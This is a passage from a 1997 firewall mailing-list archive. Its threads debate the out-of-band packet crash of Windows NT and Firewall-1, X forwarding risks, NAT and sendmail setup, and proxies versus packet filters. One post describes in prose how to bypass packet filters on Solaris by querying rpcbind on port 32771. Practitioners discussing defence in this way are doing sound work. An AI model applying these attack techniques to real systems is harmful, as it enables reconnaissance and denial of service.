girsch@marben.com (Arnaud Girsch) writes: > For example, you probably restrict X because you think that X is never secure > and can be abused, etc ... Giving access to X within a ssh tunnel protects > against most of the X problems, so why not giving X access then ? I'm not sure, but what about this one: If the remote machine has been hacked, then X forwarding can be more of a problem than help. If the remote sshd (or /bin/*sh or whatever) has been modified to use that X forwarding they're just about right in your local machine. And you can't even tell because you'd need your local users private key to decrypt things to analyze them. Anyone know more about this? Ben -- Ben(edikt)? Stockebrand Runaway ping.de Admin---Never Ever Trust Old Friends My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address im- plicitly agrees to pay a DM 500 fee to the recipient for proofreading services. From owner-firewalls-outgoing Thu Jun 5 21:24:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA26114 for firewalls-outgoing; Thu, 5 Jun 1997 13:58:49 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA24193 for ; Thu, 5 Jun 1997 13:48:24 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id PAA07746; Thu, 5 Jun 1997 15:52:34 -0500 Date: Thu, 5 Jun 1997 15:52:32 -0500 From: Craig Brozefsky Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts To: "Bryan D. Boyle" cc: Jyri Kaljundi , firewalls@GreatCircle.COM In-Reply-To: <199706051346.JAA02854@hogpb.ho.att.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997, Bryan D. Boyle wrote: > It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, > since the OS is not in their control. They can only operate (or be as > secure as) at the least common denominator level of the underlying OS. As a vendor deploying a security product on that platform, I feel it is their responsibility, otherwise they should properly compensate for the immaturity and bugginess of their host platform, or simply not deploy. Security products in general are such a bugaboo, prone to playing ont he customers paranoia, selling with hype, scare tactics and generall IMO are very slimy when they reach the broad consumer market. Look at ADT and the home security market. > Nothing except MS code operates in the NT kernel. This problem is with > what happens when you send oob data to a stack (MS) that is tightly integrated > with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS > interface and control mechanism itself is crap. Can you name a stack ths is not tightly integrated with the kernel? > Of course, on UN*X systems, this is not the case. This is a signal example > of the difference between designing for peer review of your security model > and designing for what gets good trade publication reviews. Hardly the case. Unix vendors are just as prone to market influences as MS, although their code bases are usually much more stable, and more mature. People really wanted a multi-host authentication and information database for the OS, and we get NIS+, as security problematic as anything else out there. > If there is an overall architectural problem with NT as it is, then the OS > bugs matter A LOT. But, of course, those that say you can trust a black box > solution since the vendors are trustworthy are quite quiet on this regard... It's an issue for both the implementor and the consumer. > I would agree that you should ignore NT as an OS platform in a > security solution right now. Just my opinion, $.02 US, etc. Agreed. Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash) From owner-firewalls-outgoing Thu Jun 5 21:27:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA25149 for firewalls-outgoing; Thu, 5 Jun 1997 11:02:09 -0700 (PDT) Received: from buffy.isi.net (buffy.isi.net [204.71.194.215]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA25127 for ; Thu, 5 Jun 1997 11:02:01 -0700 (PDT) Received: from localhost (mike@localhost) by buffy.isi.net (8.8.5/ISI-1.5) with ESMTP id LAA22857; Thu, 5 Jun 1997 11:05:16 -0700 (PDT) Date: Thu, 5 Jun 1997 11:05:16 -0700 (PDT) From: Mike Hedlund X-Sender: mike@buffy To: Daniel Strawson cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 8BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If i remember correctly, the OOB attack with NT only effected port 139, NetBios. I tried it on all other tcp ports and it had no effect. So the only way Firewall-1 would be effected by it would be if it has its own bug.. altho i could be mistaken.. if i am somone please correct me. :) -mike On Thu, 5 Jun 1997, Daniel Strawson wrote: > > Hang on a moment. > > Let me put this in perspective. > > As I understand it, this problem results from sending packets with a > particular IP option set in the header. (Please confirm I'm right here > someone). > > Firewall _SHOULD_ drop all packets with IP options set. This would mean > that all Firewall-1 systems and systems behind Firewall-1 are impervious > to this attack. (something for Checkpoint to be proud of). > > Unfortunately this is not the case - as I say I've managed to get NT to > crash with FW-1 installed. > > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > crash, you get the NT system that it is running on to crash, so it is not > an insecurity, but a claimed feature that doesn't work. > > So, either - > > - The IP Options drop code in FW-1 doesn't work. > > or > > - I do not properly understand this attack and it does not work as I > imagine - in this case, please correct me. > > Cheers, > > Daniel > > > > On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > > > On Wed, 4 Jun 1997, Daniel Strawson wrote: > > > > > We tried it and, yes we managed to crash an NT based Firewall-1 system. > > > This is odd since (if memory serves) the packets should be dropped on the > > > floor by the stateful inspection module. > > > > You mean you can crash and NT FW-1 by sending OOB data to it?! > > That's scary if it is true and should be addressed by Check Point ASAP! > > > > What I have always thought of FW-1 is that it operates at quite low level > > inside the OS kernel, that as long as you filter everything the network > > bugs in the OS don't really matter, as the packets never reach FW-1. > > > > If sending some bytes of data to FW1 crashes it and the OS, this > > combination (FW1+NT) should not be used as a firewall solution at all. May > > be someone from CP could explain, how much do the bugs in the OS matter > > once FW1 is installed. > > > > Jüri > > > > > > From owner-firewalls-outgoing Thu Jun 5 21:31:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20262 for firewalls-outgoing; Thu, 5 Jun 1997 10:37:50 -0700 (PDT) Received: from interlock.reston.ans.net (interlock.reston.ans.net [192.77.167.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA20232 for ; Thu, 5 Jun 1997 10:37:41 -0700 (PDT) Received: by interlock.reston.ans.net id AA23817 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Thu, 5 Jun 1997 13:40:31 -0400 Message-Id: <199706051740.AA23817@interlock.reston.ans.net> From: "Conrad Minor" To: "Jyri Kaljundi" , "Bryan D. Boyle" Cc: Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts Date: Thu, 5 Jun 1997 13:39:32 -0400 X-Msmail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, This of course doesn't address the problem with the FW1. It is just to refute the notion that NT is a completely closed OS. Any firewall worth it's salt won't be running the native NT stack unmodified. How for example would you plumb something like stateful inspection onto an NT box without kernel changes? There are several methods of modifying the stack to harden it against attack or change the way it operates. The first would be to shim the stack ie putting a driver between the Ethernet card drivers and the stack itself. NT has built in support for this. Just read the DDK documentation. NT 4.0 has even better support then 3.51 since Msoft has added calls that let you dynamically hook into the NDIS stuff. This is in fact that's how RAS is implemented (NDISWAN). Another option of course is to replace the TCP stack all together. Centri from Global Internet does that. Check out their web page. They completely bypass the microsoft stack by building their own proprietory stack which intercepts all packets coming to the firewall. They optionally will pass packets to the Msoft stack depending on how your rules are configured. Packet filter firewalls don't even need a TCP stack. Just hooks into the NDIS routines that handle the reception and distribution of packets. Probably could do this with another SHIM. All of this is documented by Microsoft, The source code for sample drivers are available as part of the DDK. While there are no sample SHIM drivers, a buddy and I created one for NT3.51 in about a month. It was really a matter of combining an existing ethernet driver with an existing protocol driver and making them talk to each other. NT even has source level debugging at the kernel layer. Name some UNIX boxes that support that (not to suggest that one is better then the other, just that NT kernel work is easier. Streams are pretty damn elegant). Conrad ---------- > From: Bryan D. Boyle > To: Jyri Kaljundi > Cc: firewalls@greatcircle.com > Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts > Date: Thursday, June 05, 1997 9:46 AM > > At 03:08 PM 6/5/97 +0300, you wrote: > > >You mean you can crash and NT FW-1 by sending OOB data to it?! > >That's scary if it is true and should be addressed by Check Point ASAP! > > > > It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, > since the OS is not in their control. They can only operate (or be as > secure as) at the least common denominator level of the underlying OS. > > >What I have always thought of FW-1 is that it operates at quite low level > >inside the OS kernel, that as long as you filter everything the network > >bugs in the OS don't really matter, as the packets never reach FW-1. > > Nothing except MS code operates in the NT kernel. This problem is with > what happens when you send oob data to a stack (MS) that is tightly integrated > with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS > interface and control mechanism itself is crap. > > Of course, on UN*X systems, this is not the case. This is a signal example > of the difference between designing for peer review of your security model > and designing for what gets good trade publication reviews. > > > > >If sending some bytes of data to FW1 crashes it and the OS, this > >combination (FW1+NT) should not be used as a firewall solution at all. May > >be someone from CP could explain, how much do the bugs in the OS matter > >once FW1 is installed. > > If there is an overall architectural problem with NT as it is, then the OS > bugs matter A LOT. But, of course, those that say you can trust a black box > solution since the vendors are trustworthy are quite quiet on this regard... > > I would agree that you should ignore NT as an OS platform in a > security solution right now. Just my opinion, $.02 US, etc. > > Flames to /dev/null. > -- > Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584 > #include | VIRTUAL: http://www.access.digex.net/~bdboyle > AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ > | HISTORICAL: HQ, 6th Battalion, Army of No. VA. > "What country can preserve its liberties, if its rulers are not warned > from time to time, that its people preserve the spirit of resistance?" > -Thomas Jefferson, 1787 From owner-firewalls-outgoing Thu Jun 5 21:46:02 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA15928 for firewalls-outgoing; Thu, 5 Jun 1997 12:58:42 -0700 (PDT) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id MAA15833 for firewalls@greatcircle.com; Thu, 5 Jun 1997 12:58:16 -0700 (PDT) Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA06551 for ; Tue, 3 Jun 1997 08:38:46 -0700 (PDT) Received: from Mailhub by garanti1.garanti.com.tr id AA05948; Tue, 3 Jun 1997 18:41:52 +0400 Received: from GarantiUser by GarantiMailServer id AA11228; Tue, 3 Jun 1997 18:39:52 +0400 Received: from [10.0.4.106] by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA36014; Tue, 3 Jun 1997 18:38:28 +0400 Message-Id: <3394C7E5.5F51@garanti.com.tr> Date: Tue, 03 Jun 1997 18:41:58 -0700 From: Cihan Subasi Reply-To: csubasi@garanti.com.tr Organization: Garanti Ticaret X-Mailer: Mozilla 3.0Gold (Win16; I) Mime-Version: 1.0 To: Firewall Mailing List Subject: HELp on SNG config... Content-Type: text/plain; charset=iso-8859-9 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For the first time I have to configure NAT on SNG..one our internal web server will be visible to outside...But there is not much thing in the manual, Reserve adresses and Mapping, I have already done those but still I guess something is missing can anybody help me on that???? Thanks -- *************************************************************** Cihan Subasi Garanti Ticaret, Istanbul Turkey email= cihans@garanti.com.tr or csubasi@garanti.com.tr Phone= +902126570404 Fax = +902126570473 *************************************************************** From owner-firewalls-outgoing Thu Jun 5 22:11:34 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA03337 for firewalls-outgoing; Thu, 5 Jun 1997 09:00:32 -0700 (PDT) Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA03046 for ; Thu, 5 Jun 1997 08:59:27 -0700 (PDT) Received: from Mailhub by garanti1.garanti.com.tr id AA19722; Thu, 5 Jun 1997 19:04:09 +0400 Received: from GarantiUser by GarantiMailServer id AA10788; Thu, 5 Jun 1997 19:03:25 +0400 Received: from fw1.fw.garanti.com.tr by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA34554; Thu, 5 Jun 1997 19:01:49 +0400 Message-Id: <33977065.5FC5@garanti.com.tr> Date: Thu, 05 Jun 1997 19:05:25 -0700 From: Cihan Subasi Reply-To: csubasi@garanti.com.tr Organization: Garanti Ticaret X-Mailer: Mozilla 3.0Gold (Win16; I) Mime-Version: 1.0 To: Firewall Mailing List Subject: Unknown log entry... Content-Type: text/plain; charset=iso-8859-9 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I had those two line in my firewall logs, can anybody explain me what are they??? -------------------------------------------------- Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for "66.3.196.2 08.in-addr.arpa IN PTR", got type "CNAME" Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for "66.3.196.2 08.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa" -------------------------------------------------- Thanks, *************************************************************** Cihan Subasi Garanti Ticaret, Istanbul Turkey email= cihans@garanti.com.tr or csubasi@garanti.com.tr Phone= +902126570404 Fax = +902126570473 *************************************************************** From owner-firewalls-outgoing Thu Jun 5 22:14:48 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA10136 for firewalls-outgoing; Thu, 5 Jun 1997 20:39:19 -0700 (PDT) Received: from pebbles.gtri.gatech.edu (pebbles.gtri.gatech.edu [130.207.204.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA10107 for ; Thu, 5 Jun 1997 20:39:08 -0700 (PDT) Received: from jones (102-thomaston.alltel.net [206.229.146.102]) by pebbles.gtri.gatech.edu (8.8.5/8.8.5) with SMTP id XAA16853; Thu, 5 Jun 1997 23:44:33 -0400 (EDT) Message-Id: <199706060344.XAA16853@pebbles.gtri.gatech.edu> Comments: Authenticated sender is From: "Jim Jones" To: Firewall Mailing List , csubasi@garanti.com.tr Date: Thu, 5 Jun 1997 23:43:34 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Limiting Mail size.. In-reply-to: <339773DE.3884@garanti.com.tr> X-mailer: Pegasus Mail for Win32 (v2.52) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sendmail? Use the delivery agent M= equate, set it for any delivery agents you want to limit. (page 388 of my now old Costales "Sendmail" book). or Use checkcompat(). (page 195 of same). -Jim > Date: Thu, 05 Jun 1997 19:20:14 -0700 > From: Cihan Subasi > Reply-to: csubasi@garanti.com.tr > Organization: Garanti Ticaret > To: Firewall Mailing List > Subject: Limiting Mail size.. > It is out of topic but how can I limit inbound and outbound email > size... > > Thanks, > -- > > > *************************************************************** > Cihan Subasi > Garanti Ticaret, Istanbul Turkey > > email= cihans@garanti.com.tr or csubasi@garanti.com.tr > Phone= +902126570404 > Fax = +902126570473 > *************************************************************** > > From owner-firewalls-outgoing Thu Jun 5 22:30:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA04890 for firewalls-outgoing; Thu, 5 Jun 1997 14:45:26 -0700 (PDT) Received: from nimue.jammed.com (jammed.com [165.227.120.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA04879 for ; Thu, 5 Jun 1997 14:45:19 -0700 (PDT) Received: (from deadmail@localhost) by nimue.jammed.com (8.8.5/8.8.5) id OAA18829 for firewalls@greatcircle.com; Thu, 5 Jun 1997 14:49:15 -0700 Received: from nimue.jammed.com (gate.jammed.com) by gate.jammed.com (deadmail-1.1/JAMMED) via SMTP; Thu Jun 5 14:49:15 1997 Date: Thu, 5 Jun 1997 14:49:13 -0700 (PDT) From: "James W. Abendschan" To: firewalls@greatcircle.com Subject: Re: [SNI-14]: Solaris rpcbind vulnerability (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, Oliver Friedrichs wrote: > Secure Networks Inc. > > Security Advisory > June 4, 1997 > > Solaris rpcbind weaknesses [ ... ] When I saw this a few weeks ago on SNI's web page (it wasn't published as an advisory, it was published as one of the checks their Ballista tool performs) I was intrigued, so I sat down and spent some time trying to exploit this. By modifying rpcinfo.c to connect to port 32771 and changing the PMAPPROC_DUMP stuff to work over UDP instead of TCP (clntudp_create), you can get nicely functional "over-the-packet-filter" rpc dump. If there's interest, I'll post diffs. Now the *real* trick is figuring out how to get Solaris NFS to give up its export list over another high-numbered port.. James -- James W. Abendschan jwa@jammed.com JAMMED Systems, Inc. http://www.jammed.com "Turing," she said. "You are under arrest." -- William Gibson From owner-firewalls-outgoing Thu Jun 5 22:39:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA09770 for firewalls-outgoing; Thu, 5 Jun 1997 09:40:18 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA09727 for ; Thu, 5 Jun 1997 09:39:55 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id MAA06916; Thu, 5 Jun 1997 12:40:33 -0400 (EDT) From: Adam Shostack Message-Id: <199706051640.MAA06916@homeport.org> Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: <199706051346.JAA02854@hogpb.ho.att.com> from "Bryan D. Boyle" at "Jun 5, 97 09:46:02 am" To: bdboyle@att.com (Bryan D. Boyle) Date: Thu, 5 Jun 1997 12:40:33 -0400 (EDT) Cc: jk@stallion.ee, firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A friend suggests that the problem may be that the FW1 is passing code upwards to the NT stack. FW1 sits beneath the stack, and intercepts packets before they can do damage. However, if you configure the firewall to allow packets to the NT stack, then NT will crash. I'll point out that if this is so, then an Application Proxy* probably would not exhibit the same behavior, since it would rebuild the IP packet, instead of sending the OOB packet on to its destination when it hits an "OK" rule. Adam * Application Proxy in the archtypical sense. I have not tested any to see how they handle this. Bryan D. Boyle wrote: | At 03:08 PM 6/5/97 +0300, you wrote: | | >You mean you can crash and NT FW-1 by sending OOB data to it?! | >That's scary if it is true and should be addressed by Check Point ASAP! | > | | It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, | since the OS is not in their control. They can only operate (or be as | secure as) at the least common denominator level of the underlying OS. -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-firewalls-outgoing Thu Jun 5 22:39:32 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06303 for firewalls-outgoing; Thu, 5 Jun 1997 12:04:37 -0700 (PDT) Received: from newfed.frb.gov (newfed.frb.gov [198.3.221.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA06259 for ; Thu, 5 Jun 1997 12:04:26 -0700 (PDT) Received: from FRB.GOV (umailfwd@localhost) by newfed.frb.gov (8.8.5/8.8.5) with UUCP id OAA28402; Thu, 5 Jun 1997 14:37:06 -0400 (EDT) Received: from kryten.frb.gov by frbgate.FRB.GOV (4.1/SMI-4.0) id AA19185; Thu, 5 Jun 97 14:42:53 EDT Received: from localhost.frb.gov (localhost.frb.gov [127.0.0.1]) by kryten.frb.gov (8.8.5/8.8.5) with SMTP id OAA09090; Thu, 5 Jun 1997 14:42:53 -0400 (EDT) Message-Id: <199706051842.OAA09090@kryten.frb.gov> X-Authentication-Warning: kryten.frb.gov: localhost.frb.gov [127.0.0.1] didn't use HELO protocol X-Mailer: exmh version 1.6.5 12/11/95 To: Cy Ardoin Cc: "Jonathan M. Bresler" , Firewalls@GreatCircle.COM Subject: Re: PIX and FW-1 (packet filter Question) In-Reply-To: Your message of "Thu, 05 Jun 1997 14:11:33 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 05 Jun 1997 14:42:53 -0400 From: "Jonathan M. Bresler" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >On Thu, 5 Jun 1997, Jonathan M. Bresler wrote: > >> >> >I don't think there is anything an application firewall can >> >do that can't also be done by a "packet filter" firewall. The >> >> trivial example: >> a smtp application level proxy can disable the "debug" command >> for every sendmail behind that firewall. > >Finding and removing the "debug" command from smtp connections at the >packet layer isn't much different than finding and altering the PORT and >PASV part of the FTP command and all the NAT style packet filters >modify the FTP commands. It's not something packet filters do, but >it is no more difficult than many of the things they already do. Cy, the difficulty of implementing this is not the point. the point is that application level proxies provide this. packet filters, stateful or not, do not provide this. aint hard to apply a tourniquet, but until its applied, someone bleeds to death ;) jmb From owner-firewalls-outgoing Thu Jun 5 23:57:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA21761 for firewalls-outgoing; Thu, 5 Jun 1997 13:34:04 -0700 (PDT) Received: from firewall2.Lehman.COM (firewall.Lehman.COM [192.147.65.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA21589 for ; Thu, 5 Jun 1997 13:33:20 -0700 (PDT) From: carson@lehman.com Received: (from smap@localhost) by firewall2.Lehman.COM (8.8.5/8.6.12) id QAA12145; Thu, 5 Jun 1997 16:37:04 -0400 (EDT) Received: from unknown(146.127.39.20) by firewall2 via smap (V1.3) id tmp012125; Thu Jun 5 16:36:59 1997 Received: from kublai.lehman.com by relay.lehman.com (4.1/LB-0.6) id AA08264; Thu, 5 Jun 97 16:36:58 EDT Received: from dragon.lehman.com by kublai.lehman.com (4.1/Lehman Bros. V1.6) id AA10604; Thu, 5 Jun 97 16:36:54 EDT Received: by dragon.lehman.com (SMI-8.6/Lehman Bros. V1.5) id QAA19850; Thu, 5 Jun 1997 16:36:54 -0400 Date: Thu, 5 Jun 1997 16:36:54 -0400 Message-Id: <199706052036.QAA19850@dragon.lehman.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Anton J Aylward Cc: Bernd Eckenfels , firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-Reply-To: <3.0.32.19970605082442.0094c5f0@the-wire.com> References: <3.0.32.19970605082442.0094c5f0@the-wire.com> X-Mailer: VM 6.27 under 20.1 XEmacs Lucid (beta8) Reply-To: carson@lehman.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> "Anton" == Anton J Aylward writes: Anton> I believe this is a problem in information content. The HOST Anton> command, as Bernd says, is not implemented widely enough to make it Anton> practical. The people who talk about kernel hack support for a Anton> plug-gw solution have not made it clear how the lost information is Anton> to be regenerated. It's never lost in the first place. You set up static NAT and have the firewall as the route for that subnet. It's just like using virtual interfaces (and consumes that same amount of address space). The only other way of doing things is to assume that the Host: header is present, and provide a "which site did you _really_ mean" page/script for queries lacking said header. -- -- Carson Gaspar -- carson@cs.columbia.edu carson@lehman.com http://www.cs.columbia.edu/~carson/home.html From owner-firewalls-outgoing Fri Jun 6 00:16:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA02774 for firewalls-outgoing; Thu, 5 Jun 1997 08:58:08 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA02634 for ; Thu, 5 Jun 1997 08:57:42 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id LAA01436; Thu, 5 Jun 1997 11:01:49 -0500 Date: Thu, 5 Jun 1997 11:01:48 -0500 From: Craig Brozefsky Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts To: Daniel Strawson cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997, Daniel Strawson wrote: > Hang on a moment. > > Let me put this in perspective. > > As I understand it, this problem results from sending packets with a > particular IP option set in the header. (Please confirm I'm right here > someone). > > Firewall _SHOULD_ drop all packets with IP options set. This would mean > that all Firewall-1 systems and systems behind Firewall-1 are impervious > to this attack. (something for Checkpoint to be proud of). Uhm, I don't have any RFCs or source code in front of me right now, but my understanding was that several options would need to get thru, OOB being one of them, as some applications make use of it, telnet for instance if I'm not mistake (tho I may be and invite correction). > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > crash, you get the NT system that it is running on to crash, so it is not > an insecurity, but a claimed feature that doesn't work. Not how I would interpret it. I would consider this the responsibility of he FW vendor. They are responsible for the TCP/IP stack IMO. If they aren't replacing it, then they are assumign the OS vendor is competent, not something I would agree with. Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash) From owner-firewalls-outgoing Fri Jun 6 00:31:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA19746 for firewalls-outgoing; Fri, 6 Jun 1997 00:17:52 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA19699 for ; Fri, 6 Jun 1997 00:17:41 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id AAA01188 for ; Fri, 6 Jun 1997 00:25:12 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA09552; Fri, 6 Jun 97 00:23:30 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id AAA16788 for @sybgate.sybase.com:firewalls@greatcircle.com; Fri, 6 Jun 1997 00:22:22 -0700 (PDT) Message-Id: <199706060722.AAA16788@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 37EDCDE84B0420CE882564AE0028F002; Fri, 6 Jun 97 00:22:22 EDT To: firewalls From: Ryan Russell/SYBASE Date: 6 Jun 97 0:29:07 EDT Subject: Stateful Packet Filters vs. Proxies Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, I finally got around to writing down my arguments on the above subject. Check it out at: http://futon.sfsu.edu/~rrussell/spfvprox.htm Warning: It's lengthy. Comments welcome. Ryan From owner-firewalls-outgoing Fri Jun 6 00:46:07 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA09207 for firewalls-outgoing; Thu, 5 Jun 1997 20:33:51 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA09192 for ; Thu, 5 Jun 1997 20:33:44 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id WAA15247; Thu, 5 Jun 1997 22:38:11 -0500 Date: Thu, 5 Jun 1997 22:38:10 -0500 From: Craig Brozefsky Subject: Re: PIX and FW-1 (packet filter Question) To: Firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997, Cy Ardoin wrote: > On Thu, 5 Jun 1997, Jonathan M. Bresler wrote: > > > > > >I don't think there is anything an application firewall can > > >do that can't also be done by a "packet filter" firewall. The > > > > trivial example: > > a smtp application level proxy can disable the "debug" command > > for every sendmail behind that firewall. > > Finding and removing the "debug" command from smtp connections at the > packet layer isn't much different than finding and altering the PORT and > PASV part of the FTP command and all the NAT style packet filters > modify the FTP commands. It's not something packet filters do, but > it is no more difficult than many of the things they already do. Uhm, how about provide authentication at the firewall, like SecureID (yuck) or CryptoCard, or even just APOP for a POP3 proxy? How about provide a SMTP deamon capable of accepting mail, but not requiring anything more than putting it into a directory for another, non priveledged deamon to forward toa full features MTA that is unnaccesable to the outside world? This SMTP deamon on the firewall being a very simple beast and leaving much less room for fuckup in code, deisgn, then let's say, letting packets go thru to a full featured MTA, like uhm, sendmail maybe or Exchange, or Netscape's Mail Server, and having to modify your packet to block out attacks as they are published. Surely alot more work than putting SMAPD on your firewall and not having to worry about tracking bugs in your full MTA (or at least a very large class of bug). Or filter HTTP based on MIME type and response size. Hand waving and 'well it could' doesn't get you much of anywhere tho, not to imply that this is what your doing, but just pointing out that theory is wonderful and very useful, but when it comes to 'capabilities' assesments like this, it's often better to stay within the somewhat agreed upon realm of reality. Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash) From owner-firewalls-outgoing Fri Jun 6 01:32:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA03330 for firewalls-outgoing; Thu, 5 Jun 1997 09:00:27 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA03013 for ; Thu, 5 